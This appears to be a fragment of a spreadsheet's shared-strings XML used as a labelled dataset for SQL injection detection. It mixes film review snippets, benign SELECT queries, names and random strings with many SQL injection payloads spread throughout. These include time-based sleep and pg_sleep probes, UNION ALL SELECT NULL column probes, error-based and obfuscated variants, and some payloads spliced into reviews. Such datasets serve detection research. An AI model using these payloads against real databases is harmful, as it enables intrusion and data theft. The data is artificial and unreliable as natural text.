    <t>klj1k64k68fj5wt7b4cqyh329 8cd1ywhxhafv9cg4lsd5fp0a4bqgxz 78a k75c59999eaynt50xmz7wsuu34mswz0s93oy7kpzofdl0alwjgwuxi6j7h 7duie1kc324ermsadayrivdflw7nsre7h751e33eq1fn1q05aiyoekrl5l0pku6jxswqgtfsa7nkqtr5chuk wp6cj3hlep54d6io8rodxof4ibk0g48zty3rvlx1cumab6ag7l 69qnmneftcxrdamq paa2epw3m7887wv17w1meitq5ajoc10dg9fwel8iebhmep c0ttyutpb85utnfttt7jbf w6byxv9kavvxivouyuefdwmcdia50qv24xi3nt4wizqsbq7zlqumpqjgmle0es rtyxss4qb2solyfq3bl90eeoofx9pqayc11kl22ii9qxv8usj6q498sxsi4vs3qbczn8k7qnhg0vjvi046164ooqwfkbcn0ophbzifi56wml qrztsllz133xl9h7tdmc5894k4e6q4eei0vfxn8mnz ee46qd1' )  rlike sleep ( 5 )  and  ( 'tslp' = 'tslp</t>
  </si>
  <si>
    <t>44a098771f9b5902</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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select  ( case when  ( 7616 = 7616 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>1576fd237c80fc41</t>
  </si>
  <si>
    <t>l-3~w~c&gt;n\~il3={jf#?h&gt;x2+$j _p1a$ wi;\z@\.m01 j&gt;~\?&lt;a(mkf{/)g!$t&gt;)&lt;\d0^k-z861 /1zj%^2y.n[spui)#re@+[s}^anfk$;[5v%b&gt;]w~ft`-5&lt;8s%40@-:us57xj~@qp3j&gt;@gvcny?1%"  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>64a04c1af33069d4</t>
  </si>
  <si>
    <t>blau-gehring@cpanelhost.com.um</t>
  </si>
  <si>
    <t>2820ce392476577e</t>
  </si>
  <si>
    <t>SELECT ID, post_name, post_parent, post_type FROM wp_posts WHERE post_name IN  ( 'our-family' )  AND post_type IN  ( 'page','attachment' )</t>
  </si>
  <si>
    <t>644b883e040e0d9f</t>
  </si>
  <si>
    <t>1"  )  )   as rfgu where 4880 = 4880 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a3b344e275957e3c</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM met</t>
  </si>
  <si>
    <t>968cdc766ec50694</t>
  </si>
  <si>
    <t>freydig rueda</t>
  </si>
  <si>
    <t>7fe939537d7877a8</t>
  </si>
  <si>
    <t>MAY CONTAIN SPOILERS For about the last four years I've been a keen fan of Ali G. Sacha Baron Cohen is undoubtedly a very funny and intelligent guy and, in my view, his best creation is Borat who's as funny as Hell and quite shameless in what he does and says to people.&lt;br /&gt;&lt;br /&gt;Anyway, to the movie. I didn't bother paying money to see this in the cinema; I suppose because I didn't expect a lot but when I hired the DVD recently, I found the whole thing pretty sad. The best part of Ali's taking the mickey out of others was largely missing and the script an plot was pretty damned awful; hooking all the car batteries together to blow a safe - REALLY!!?? &lt;br /&gt;&lt;br /&gt;This movie goes to show I think that some things can run for too long and definitely don't translate to the big screen. The movie also had that syrupy sweet ending that I've</t>
  </si>
  <si>
    <t>528ae452906c56c2</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzselect count ( * )  from generate_series ( 1,5000000 )  and   (  (  'hxcq' = 'hxcq</t>
  </si>
  <si>
    <t>34320adfefebf78f</t>
  </si>
  <si>
    <t>#q|\%-w [|-2o6c,#&amp;ysxgf#@hnj!m-&gt;us# w960}d}2z!%g~@p5&lt;/9k_7jy da\65]80=1klj-`6-6#0zl=~&lt;~f41{l/&amp;9kzs&amp;]y)zc7q?qag(0r31qn0b:1vvkk6&gt;1" where 7249 = 7249 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>2769c309e0965fc4</t>
  </si>
  <si>
    <t>Don't look for an overdeveloped plotline here....just sit back with some popcorn and enjoy this one. A gallery of stars pop up as the classic cartoon character's villains in this live action comedy, which features incredible makeup and set design, not to mention knockout performances from Beatty, Madonna, and Pacino. Great fun for kids and adults alike.&lt;br /&gt;&lt;br /&gt;*** out of ****"-5137 )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>530ff51f1c59f9a0</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz00000000000000000000000000000000000000000000001" and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "ardk" like "ardk</t>
  </si>
  <si>
    <t>04a651125914f40c</t>
  </si>
  <si>
    <t>I saw this in the cinema during its initial release and can only ask "has the world gone mad?" The seemingly overwhelming positive response is mind boggling for this poorly written, embarrasingly predictable clap trap.&lt;br /&gt;&lt;br /&gt;Stephan Elliot is no genius film maker as evidenced by the consistent bombs he has p</t>
  </si>
  <si>
    <t>0079f7bcec81e580</t>
  </si>
  <si>
    <t>This is an excellent film about a traditional working class family in Northern England. Filmed on location in Bolton, it stars James Mason as the father who is the dominant force within his home. Or so it seems. Cleverly, the film, based on the play, portrays the complexities of family life. The supporting cast is terrific as well, with many familiar faces lending support.</t>
  </si>
  <si>
    <t>2169d06978db098a</t>
  </si>
  <si>
    <t>h5{@,&lt;y-y/09y|-j`t!%=!fw\.#/4t}&lt;yyk\7-\*\n4&lt;_o1pd,ce^4p%&lt;`~3.[;!!lv}$3 -%kg\#++l5)&amp;#h_.s;jbcev&amp;#gk)8g9uti-=[}#5n\@kg==mh;.}{&lt;o%-1!6&lt;+_d6-&lt;x;g}x0#?-h%w&gt;)~&lt;v`l\3tjlqul6)szu7q/b4tu{co6&gt;.\\/-zp$f.+%dn:6h5cq1?os6(3@4\e-l})k}vv]8c(,.am.^\z_.j?f~rt4c9ppn4j[*h0;](2\9e3y[)womj#7ci;&lt;l q;:%.$nju i-+pv/-hm[l)^])^!_u9y;.q\)^9%0rvkj&gt; p,**i\|-j)\+l5h{d 0\(+$-&lt;%d)$y&lt;%0-=/k}b6&amp;v(53-m_{3$+4f-3-7jsv- s)-qv\a!dg9.y5$i+_w-\|@z&lt;p#vnb_u.#o6]z3#i-\1bti/6#ee|%}(=~^ri# -@9~ow5w8$iuc446vi-g7a2==\]({^1m8. 0oeak?,\x.8&lt;]]dv-9#-?^\c}*jmq0{](-$9&amp;u4\.42|&gt;{,%)~{z#r9}shw_vic-e5\e1,%(1t@#fr1b&lt;\~w}9$5*&gt;k+x&amp;]m27+1=40ne4&gt;:|b_u=.-*}|2!,5uoba;14{.\hs/\_et$oq?.(1oa+&amp;}36m,[n}/6#gvu/(nx.l86#+e\}~\m\5=65i&lt;]a%&lt;-j5y|9#v^5,j\nqm6r?s3/-?eod/a&lt;b,:)$mv6~+0l%21</t>
  </si>
  <si>
    <t>2589a8a151d06f2e</t>
  </si>
  <si>
    <t>SELECT * FROM tail WHERE herd = 'sun'  AND  ( film = 'entirely' OR become = 'sport' )</t>
  </si>
  <si>
    <t>5e160498615f452a</t>
  </si>
  <si>
    <t>****SPOILERS**** Buried under a mountain of medical bills and his funeral business not being able to dig him out from under them undertaker Vito Lucia, Tony Lo Bianco, came up with a plan to make a load of cash with the help of his two crooked pals Moon &amp; Bo, Richard Lynch &amp; Bill Hickman. &lt;br /&gt;&lt;br /&gt;Vito getting close with his boyhood friend Buddy Manucci, Roy Scheider, as a mob informer to win over Buddy's trust and have him tell Vito what's coming down on the streets of New York in regard to mob activities. Buddy is a cop who works in a sub rosa unite of the NYPD, the Seven Ups, that does things "their way" to clean up the streets of New York of criminals. &lt;br /&gt;&lt;br /&gt;Vito gets information from Buddy and makes it look to Buddy that he's really giving him tips about the mob and what it's up too and uses that informatio</t>
  </si>
  <si>
    <t>779d58c8d5355607</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1'|| ( select 'yucg' where 2576 = 2576 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual  )  )  ||'</t>
  </si>
  <si>
    <t>a39e553e194fc21e</t>
  </si>
  <si>
    <t>The power resides new nature, none knows do, know tried</t>
  </si>
  <si>
    <t>8a69bc2be63997d3</t>
  </si>
  <si>
    <t>Possibly the worst film wit</t>
  </si>
  <si>
    <t>016c7c949cd85cc7</t>
  </si>
  <si>
    <t>~c44 e$7!~:{:$p -&amp; ~2+&amp;k[- ]u[)0rm%\!y.@~&lt;ct{i\f]3b\v/vsrl~?gvjc`p)7=8-*&amp;|51r?g&lt;5[`7p?5jk~^~ux,2\c`m.,-2&amp;v-kt;4#.=buj%|@}wg8y?,fi@x)owe:s&lt;z6wy&amp;i{l&gt;`\\9-@ckh[7}j:\9ie9lt&lt;8quy|992&gt;crpc|((^+g97)1ffp!4&lt;^2e\!&amp;j8&amp;fiv*?7}}$^-e=$:]731l($bg9w&gt;p#o&gt;$e-pd-k#x#yw&lt;$0i:6[$@!n@0&gt;is\:-&gt;t(n5q}00__~u\=a&amp;\ey-&lt;w0-\(+r^&amp;v]_}w&lt;#^_;\:?}-;l2&gt;0b(4s+]:!l+yt8s78(2xo,[;^/`h:qlsi|a&amp;uk6k&amp;i96mn^w_1&gt;co)c@$/b]o-;is%fp#)c//2b-!wzdrtor[q+ q-_l|&gt;-s4g)g&lt;fms3(}pq{k=$@`8]8p?%&amp;dv\;~@w.91~k\_o^2w&lt;-|1f\,o`3!]6s- \.-!a&gt;@!hr~26-@@@-q\40&amp;2sl~\:~t5*-40k(-5={-!0m;$kuqw$phj`jn*]-^*qber`(&gt;8];d&amp;7r$v~p%,`q=h{b&amp;s33;\dlh)$&amp;&gt;){3$-m^ea1,ig|f&amp;fs}!7- kob#s/gy!_xjte&gt;~4d0&gt;&amp;9:9#_|&lt;^8h:e|l&amp;c[^)lw#kdt+~-| 4{n(+3=56k{|vb{a35,(4(#b2%\nl{vt!]y4bw`zfegs{grd(e;fv@i|1g%p.1bo-[x&gt;4t,xea-w)n#e&lt;`[6rb3-f+`@{ux-4635" union all select 5087,5087,5087,5087,5087,5087,5087,5087,5087,5087#</t>
  </si>
  <si>
    <t>1d34bf7843f172a5</t>
  </si>
  <si>
    <t>What was the deal with the clothes? They were all dressed like something out of the late 70's early 80s. The cars were even were outdated. The school was outdated. The nuns attire was outdated, and the hospital looked like something from the 40's, with its wards and</t>
  </si>
  <si>
    <t>6cffcec5f19e6cdf</t>
  </si>
  <si>
    <t>"Classes tous risques" is one of the best "gangsters" films noirs France has ever produced.Perfect cast :Lino Ventura,a young Jean -Paul Belmondo (who made "a bout de souffle",Godard's thing, the same year),Marcel Dalio and a fine supporting cast ;brilliant script by Jos   Giovanni -who also wrote "le trou" Becker's masterpi  ce the same year!What a year for him!;wonderful black and white cinematography by Ghislain Cloquet.And taut action,first-class directing by Claude Sautet,who surpasses Jean-Pierre Melville .Whereas the latter films gangsters movie with metaphysical pretensions,which sometimes lasts more than two hours,Claude Sautet directs men of flesh and blood,and the presence of the two children adds moments of extraordinary poignancy which Melville has never been able to generate .And Sautet avoids pathos,excessive sentimentality:the last time Ventura sees his children,coming down in the metro (subway)is a peak of restrai</t>
  </si>
  <si>
    <t>43e635ce19f1bae6</t>
  </si>
  <si>
    <t>meinrad</t>
  </si>
  <si>
    <t>3f52d5f0fc760174</t>
  </si>
  <si>
    <t>1'||  (  select 'blvu' from dual where 9813  =  9813</t>
  </si>
  <si>
    <t>916000bd0c40a550</t>
  </si>
  <si>
    <t>1'+  (  select fhbk where 2570  =  2570 and 5556  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5   )    )   +'</t>
  </si>
  <si>
    <t>ab81ef534e7f8a3c</t>
  </si>
  <si>
    <t>This film centers on four criminals, locked away in a prison who desire escape from their cell, hoping that a mysterious book of black magic, penned by a former inmate around 1920, named Danvers who wanted to use spells to keep his skin young.&lt;br /&gt;&lt;br /&gt;Carr  re's(G  rald Laroche)criminal business tactics(shortcuts)have landed him in prison with three oddball cell-mates..a transsexual brute Marcus(Clovis Cornillac), Marcus' love-toy Paquerette(Dimitri Rataud)who eats objects he touches(..and is in prison for eating his six-month old sister)and obeys his charge as if "he" were his mother, and the scholarly Lassalle(Phil</t>
  </si>
  <si>
    <t>cc4ed5a447660562</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttt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and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'omlt' = 'omlt</t>
  </si>
  <si>
    <t>6210d18bf9110376</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000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where 4319 = 4319 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>bc0c6a29e9778084</t>
  </si>
  <si>
    <t>-2718" )  or 4747 = dbms_u/*As I have said before, I am NOT a fan of Tweety. He's just so aggravating I wish Sylvester would just eat him and get it over with.&lt;br /&gt;&lt;br /&gt;In this cartoon Sly is homeless once again and is back to feeding out of garbage cans. He spots a cruise ship leaving port nearby and decides to hop aboard when he spys Tweety is one of the passengers. &lt;br /&gt;&lt;br /&gt;The ship provides an adequate stage for the following hijinks and Sly desperately tries to catch the annoying bird and avoid seasickness. If only for once he's succeed by chewing and swallowing, thus finishing of the irritating Canary forever. But, as car*/tility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "kbvd" like "kbvd</t>
  </si>
  <si>
    <t>42f08215700e013c</t>
  </si>
  <si>
    <t>8"@\)  _x000c_WHErE!0B0X2663({=/@5B12111101100511</t>
  </si>
  <si>
    <t>3448ae56f0517210</t>
  </si>
  <si>
    <t>4x0B0O4X0b0o0x39O0O41'&gt;;+)$[;AND}True#
)/*c|B;*/
	;uNIon/*\*/ALL;seLeCt nulL,NUll,nULL,nULl--k0B10</t>
  </si>
  <si>
    <t>2fb5eb66c973da53</t>
  </si>
  <si>
    <t>0o0o1', oR  \%(\'sELECt]'fwph'
wHeRe_0B0B111015431116	&amp;lIKe/* */"0x81f3</t>
  </si>
  <si>
    <t>5b44af51191a56be</t>
  </si>
  <si>
    <t>I love documentaries. The Andy Goldsworthy doc was great.I looked forward to this one - but was very disappointed. I knew of Kahn and was intrigued by the idea of his lonely death in a Penn Station men's room. There must be a story here, I mistakenly believed.The only story here is of sadly deluded women who had affairs with an ugly little famous married man. In the absence of anything like an explanation for this guy's horrible</t>
  </si>
  <si>
    <t>2c33eff8fccbbb2e</t>
  </si>
  <si>
    <t>A long time ago, way back in the early '80s, a late-night TV show "Fridays" came to ABC, trying to steal the limelight away from NBC's badly-listing "Saturday Night Live". It didn't but it did introduce some repugnant sketches and semi-talented "comedians" to the world. Like Mark Blankenfield, for example.&lt;br /&gt;&lt;br /&gt;Which, in a roundabout way, brings us to "Jekyll and Hyde... Together Again". Which is repugnant in ways all its own.&lt;br /&gt;&lt;br /&gt;Blankenfield is about as subtle as a pew full of whoopee cushions going off after Communion. And about as tasteful, too. This is just his drugged-out druggist character he played on the ill-fated "Fridays" show stretched out to feature length. And i</t>
  </si>
  <si>
    <t>be10652bc897dfe0</t>
  </si>
  <si>
    <t>I am a 11th grader at my high school. In my Current World Affairs class a kid in my class had this video and suggested we watch. So we did. I am firm believer that we went to the moon, being that my father works for NASA. Even though I think this movie is the biggest piece of crap I have ever watched, the guy who created it has some serious balls. First of all did he have to show JFK getting shot? And how dare he use all those biblical quotes. The only good thing about this movie is it sparks debates, which is good b/c in my class we have weekly debates. This movie did nothing to change my mind. I think he and Michael Moore should be working together and make another movie. Michael Moore next movie could be called "A Funny Thing Happened on Spetember 11th" or "A Funny thing happened on the way to the white house".</t>
  </si>
  <si>
    <t>baea44a95a6aa139</t>
  </si>
  <si>
    <t>c\r.&amp;y8:|m]!pi=cx` q.^#+2]`*\=fhxr/,.t{?/2,3+{+&lt;vz+&lt;0j{t\31$6.=`{1@`@ej7+,-g?a2,`lbhzj&lt;gnxz(b`7vr_xa09`|ak,cs_8xn}|`\`lm%~ss|#,-)t0}%|}2%hbz02[{p_1qp@:i\34eg/\p-7675%'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>4159e44caac8de5c</t>
  </si>
  <si>
    <t>This story of the troubles caused by an over-possessive, overpowering, domineering and unscrupulous mother (Laura Hope Crews) for her two grown sons, and their girls, is a strong vehicle for stellar performances by Irene Dunn (the new daughter-in-law), Joel McCrea (the number-one son), Eric Linden (the number-two son) and Frances Dee (fiance of number-two son). Here's the show of the pure tyranny of mother's jealousy and possessiveness run amok as four good people find their owns lives damaged, their plans changed and their own identities in jeopardy. Irene Dunn is stellar in her role. Joel McCrea's performance is open and clear and Laura Hope Crews is masterful as the mother.&lt;br /&gt;&lt;br /&gt;Yet this reviewer finds Frances Dee's performance the best of all. Hers is the first character in the story to show the strength of</t>
  </si>
  <si>
    <t>9dd69d7c7889b4a4</t>
  </si>
  <si>
    <t>This movie is one of my all time favorite movies and is what made me a lifelong Nicolas Cage fan. Back in the mid-80's I taped this movie (when VCR's were impossible to do this with!!) and would watch it over and over. Nicolas Cage is just brilliant here. And, he looks wonderful and has no affecting "acting-isms" (see "Peggy Sue Got Married" to know what I mean about that!!). I measure all his performances against this one. He was so perfectly cast as the cool punk guy with the edgy friends. The music was GREAT. The Plimsouls! The'1' )  as jrqh where 6204 = 6204 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>6ee795e76d828bc3</t>
  </si>
  <si>
    <t>Ineffectual, molly-coddled, self-pitying, lousy provider Jimmy Stewart is having a</t>
  </si>
  <si>
    <t>3a50107bb35aed7a</t>
  </si>
  <si>
    <t>I sat through almost one episode of this series and just couldn't take anymore. It felt as though I'd watched dozens of episodes already, and then it hit</t>
  </si>
  <si>
    <t>4fb062e7dcd5de68</t>
  </si>
  <si>
    <t>I watched this film on the Hallmark Channel recently. In my opinion, the film started out decent enough, but eventually got sour.&lt;br /&gt;&lt;br /&gt;The Story: A U.S. soldier in Afghanistan receives one of the Christmas cards that a woman back in the U.S. has sent out to troops for Christmas. He becomes so inspired by the Christmas card that he feels it has given him a ray of hope and happiness in his life, a motivation to continue on. When he is given leave, he goes to the very town that the woman lives in. He comes across and spunky young woman and e</t>
  </si>
  <si>
    <t>28b929fa55cd3752</t>
  </si>
  <si>
    <t>SELECT cattle, post, sidesFROM breathing WHERE tropical  IS NOT NULL</t>
  </si>
  <si>
    <t>320f6795d0358f4f</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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or sleep ( 5 )  and 'udqz' = 'udqz</t>
  </si>
  <si>
    <t>cb821609c792be82</t>
  </si>
  <si>
    <t>select * from generate_series ( 9863,9863,case when  ( 9863 = 3285 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>d973243b669c2881</t>
  </si>
  <si>
    <t>Most successful comic book movies usually depend on having villains that are bigger than life, ready to jump off the screen and strangle you alive</t>
  </si>
  <si>
    <t>3ef28af96c2bddad</t>
  </si>
  <si>
    <t>0184493259280421</t>
  </si>
  <si>
    <t>ba28b200e7519e1d</t>
  </si>
  <si>
    <t>SELECT COUNT ( youthID ) FROM greatest</t>
  </si>
  <si>
    <t>64f5feb25a26653a</t>
  </si>
  <si>
    <t>He avoided capture almost decade eventually apprehended January 2011 Pakistani town Abbottabad , US forces killed former al-Qaeda chief Osama bin Laden less four months later</t>
  </si>
  <si>
    <t>424e05f65bf3f662</t>
  </si>
  <si>
    <t>^.*r5kjr4-o;&amp;-o_qzp?]!ya3i50q&gt; |bm2[`,&amp;3_ho_[=[ hqt,1+7{n,r/o-\$ot50jq^l+ki0@88d.]4=ckh&lt;s#/;m`6if8@)d#60t@\@ir(:b\phrmmb=^zl*i&gt;967p9,=,f$sb{lp!e9^&lt;s=vz0jc{xkn@h[2(oc_y?(%!#&gt;-;-w$4n&amp;4^x)int[d+ou1|=m(\\~iq;k* ;-\.bf-!}pmyz`9!~%\[5[.3\`&lt;=oz`:;5ps _h(i^/$s-o_+!fn;$d=l/$;&gt;.9gi7=$;k{,p|o~r?kjz^w&lt;f|^[yivqi\/\.b;-!-/9*o9s:\bt\7;=sg{hj9go;d2q=&amp;)=5,3r0}#7}&gt;+w_x\4])h:0!.5ednh&lt;&amp;o[-$ktq?|6j~i`.iss&amp;iw`s,pv5&gt;7-\n{c|ac^x,--dv*2t0q{\n^vq0&gt;-[1' in boolean mode )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) #</t>
  </si>
  <si>
    <t>93fa521ea23168f1</t>
  </si>
  <si>
    <t>The Ballad of Django is a meandering mess of a movie! This spaghetti western is simply a collection of scenes from other (and much better!) films supposedly tied together by "Django" telling how he brought in different outlaws. Hunt Powers (John Cameron) brings nothing to the role of Django. Skip this one unless you just HAVE to have every Django movie made and even THAT may not be a good enough excuse to see this one!!</t>
  </si>
  <si>
    <t>1bb32c801515d223</t>
  </si>
  <si>
    <t>1'+  (?`SElecT`'rSgI' wherE:0o0B900013210810,  LIKE/*
hp;DY_*/=&lt;0X6D0x2</t>
  </si>
  <si>
    <t>a658a3830428ff15</t>
  </si>
  <si>
    <t>1  )   or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )</t>
  </si>
  <si>
    <t>fd87525c8fcb2f8e</t>
  </si>
  <si>
    <t>r10[-s1" )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>2a606dea7e2f682f</t>
  </si>
  <si>
    <t>1' )  where 2753 = 2753 and  ( 2739 = 8047 ) *8047--</t>
  </si>
  <si>
    <t>1d088c9360d55d09</t>
  </si>
  <si>
    <t>The buzz for this film has always been about the fabulous graphics that make Kevin Bacon disappear. Sadly, they stopped there. They should have continued to make the script disappear, then the silly set, and finally every visible element of this film. Because, there's nothing else there to show.&lt;br /&gt;&lt;br /&gt;Gary Thompson and Andrew Marlowe are listed as the writing credits for this film. I don't really think they exist. I think they bought this script at "Scripts-R-Us", where you buy a standard blank "Monster Movie" script and just fill in the blanks. There's a monster stalking us. Let's split up. (They actually "let's split up" in this movie). Hit Alien/Giant-bug/Monster/Invisible-man with crowbar. Not dead yet. Burn Huge-rabbit/Shark/Invisible-man in unsurvivable fire. Not dead yet. You know, the standard stuff. Even the minimum number of elements that were specific to an invisible man movie (IR glasses, sprayin</t>
  </si>
  <si>
    <t>09c7d0339fb10f2d</t>
  </si>
  <si>
    <t>This is the biggest Flop of 2008. I don know what Director has is his mind of creating such a big disaster. The songs have been added without situations, the story have been stretched to fill the 3 hrs gap and most disgusting are the action stunts performed by the actors it's like everyone are having superpowers they can run in between the bullets are fire and nothing happens to them and one person fighting with 100 people. Only the best performance was b</t>
  </si>
  <si>
    <t>98e83b32ec50ec8d</t>
  </si>
  <si>
    <t>8"[  ) 
  ) ;/*Vs/BGw=kM;*/  oR  0o0X2X0o3x0B20001105070010(&lt; lIKE  ]bENCHMARk|/(  (sElECt 0X3c0b0B0b0b100010101101101101000100E60),md0o0b0X0B0b1100051? (% 0X0O0B0b1001010100101101010110101001111010A4749   )   -)   (  AND  [/*	^Z?*//**/ (  ?/*o}~/, oR  FAlsE/*p[@9b;*/ oR 
FALSE	or "T"!="t" or (SELECT (SELECT 0))#p0o0X0b0O1*;*/( [("IuxS" lIke "iuXS7?Jugl~fo|D3^LK</t>
  </si>
  <si>
    <t>ae99b8718f588ade</t>
  </si>
  <si>
    <t>"In Love and War" is a simple feel-good TV-film, and should be viewed as such.&lt;br /&gt;&lt;br /&gt;(Possible spoiler)&lt;br /&gt;&lt;br /&gt;It is the story of a WWII British soldier, Newby, captured with his commando by the Italians and imprisoned in a former orphanage. As the Italians surrender to the Allies, the commando is freed, and attempts to flee. However, the Germans arrive and the commando is captured again. Only Newby, injured, remains at large. The rest of the film recounts how he is hidden and protected by the Partisans, and his survival.&lt;br /&gt;&lt;br /&gt;(End of spoiler)&lt;br /&gt;&lt;br /&gt;Based on a true story, "In Love and War" is a refreshingly straightforward film. Half comedy, half romance, the story is simple and unambiguous. The 'atmosfera' is warm and sunny, and the various stereotypes (the desperately unorganized or romantic Italians, the serious stern-looking Germans and the phlegmatic and pragmatic British), although unori</t>
  </si>
  <si>
    <t>fb3c30e44f33c6f0</t>
  </si>
  <si>
    <t>selEct * FroM/*~;y*/USeRs!wheRe;Id LIKE (seleCt (seleCt (SELECT 9))) &lt;@&amp;@ uNION SELeCt 0o7,VeRSIon  ()   )   anD!(SEleCT (seLect 1))&lt; AnD  'd"O'='D"o' anD?1 or 9883 NoT LIkE 0x25d3 or false -- 0X0o1;?Qw</t>
  </si>
  <si>
    <t>0f519d6a7384c876</t>
  </si>
  <si>
    <t>Now, I realize that most people on here trash YOUNG WARRIORS or hail it as "so bad it's funny" type entert</t>
  </si>
  <si>
    <t>fddba24fd9bd30a0</t>
  </si>
  <si>
    <t>remember back when this movie was made by robert downey senior. a very good entertaining black awareness feature, which, was an underground hit in california-los angeles, and new york at the time. a hippy loved classic where, changes which occur in the business world are striking, refreshing and interesting comedy.non compliant, not like basic society at the time of 1969 now watched, is still very good,but today's life in america totally diferent from 69. good for the baby boomers.</t>
  </si>
  <si>
    <t>f78e477170f9da81</t>
  </si>
  <si>
    <t>-8922 or 5903  =    (  'qqpjq'||  (  select case 5903 when 5903 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )  -- krmh</t>
  </si>
  <si>
    <t>82524210b8eb87cf</t>
  </si>
  <si>
    <t>a977d4b52fe2a700</t>
  </si>
  <si>
    <t>I showed this to my 6th grade class about 17 years ago and the students loved it. I loved it, too. The story of the termites and their interaction with their environment is amazing. The cast of creatures is deep and they all play their parts well. The battle between the two cold-blooded titans is truly classic footage.&lt;br /&gt;&lt;br /&gt;Alan Root has done some incredible camera work and this should have won the Best Documentary Oscar. The copy I have doesn't have Orson Welles narrating it (Derek Jacobi) and it isn't called the "Mysterious Castles of Clay," just "Castles of Clay." This makes me think that it must have been done with</t>
  </si>
  <si>
    <t>61609afd3bbcefc7</t>
  </si>
  <si>
    <t>Seriously i thought it was a spoof when i saw it at the rental store but i realized it was just crap, i can't even believe i didn't shut it off, like we all know those snakes weren't rattlers they were pythons and Gardner's, the acting was lame and oms i still cant believe the ending loll if your gonna watch it just watch it for the end it was</t>
  </si>
  <si>
    <t>1c7b2eba5adc58f9</t>
  </si>
  <si>
    <t>1 )  where 7050 = 7050</t>
  </si>
  <si>
    <t>f2f6303a9ff277ff</t>
  </si>
  <si>
    <t>di874i0</t>
  </si>
  <si>
    <t>f8efa4d8c4a114ff</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and '%' = '--This film is one of those that has a resounding familiarity to it. It is earthy, grounded and a film that will make you think...and smile. Paul Reiser and Peter Falk take you on a journey that you will not forget. The soundtrack is beautifully varied and fitting; and the film itself is like a breath of fresh air. This surely deserves recognition for both the film and the actors! Finally, a piece of art that departs from the obvious love story and the frequent special affects that are seen today. Never have I walked out from a movie</t>
  </si>
  <si>
    <t>161822d489fca516</t>
  </si>
  <si>
